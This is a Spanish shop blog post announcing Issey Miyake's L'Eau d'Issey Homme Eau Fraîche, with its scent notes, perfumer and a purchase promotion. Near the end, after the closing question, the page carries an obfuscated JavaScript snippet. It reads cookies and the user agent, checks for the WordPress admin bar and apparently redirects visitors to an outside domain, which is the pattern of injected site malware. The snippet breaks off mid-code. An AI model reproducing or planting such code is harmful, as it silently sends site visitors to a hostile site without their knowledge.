EH-EDT-2016_Packshoots-on-rock_2_RGB-Web_4062px_240dpi_1199x800

Hoy venimos con un nuevo producto fresquito fresquito que hará las delicias de todos los hombres la próxima época de Primavera-Verano.

La novedad viene de la mano de Issey Miyake, marca reconocida por sus perfumes masculinos que tanto gustan y por algo será.

Issey Miyake lanza al mercado la versión Eau De Toilette Fraîche de su mítico perfume de hombre L’Eau d’Issey Homme, un agua fresca que nos hará sentir la sensación de una cascada de agua cae sobre nuestra piel.

issey-miyake-l-eau-d-issey-homme-eau-de-toilette-fraiche

Su hermano mayor L’Eau d’Issey Homme se lanzó en 1994 como fragancia masculina y fue todo un hito que continua en la actualidad.

La versión más fresca de L’Eau d’Issey Homme ha sido encargada al perfumista Christophe Raynaud. El perfume pertenece a la familia Hespéride Acuática Amaderada.

En su composición olfativa encontraremos una gran variedad de ingredientes que no nos dejará indiferentes como son el yuzu, las maderas y las especias de la fragancia clásica L’Eau d’Issey Pour Homme que siguen presentes en esta nueva variación olfativa.

¿A qué huele?

  • Como notas de salida encontramos la nota cítrica del pomelo, bergamota, romero, menta y  cardamomo fresco.
  • En sus notas de corazón yerbamate con una base de pimienta rosa y rosa de Mayo matizados con salvia y lavanda.
  • Para finalizar con notas de fondo pachulí blanco con almizcle y vetiver.

L’Eau d’Issey Pour Homme Eau Fraîche es un perfume fresco, puro y una fuente de energía, masculino mucha personalidad contraria a aquellos perfumes muy intensos.

Desde Issey Miyake han conseguido a través de la campaña publicitaria transmitir las sensaciones que provoca L’Eau d’Issey Pour Homme Eau Fraîche.

Creada por el director y fotógrafo británico Ryan Hopkinson, toma como protagonista la fuerza de los elementos naturales.

Os recomendamos echarle un vistazo y saquéis vuestras propias conclusiones.

Además ahora por  la compra de cualquier fragancia masculina de Issey Miyake, recibe de regalo una minitalla de 15 ML.  (Promoción válida hasta agotar existencias).

TU REGALO POR COMPRA

 Y a partir de hoy, Día 16 de Marzo y hasta el próximo 19 de Marzo tendrás gastos de envío gratis sin importe mínimo.
Cuéntanos, ¿Utilizas perfumes frescos para la época estival?

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone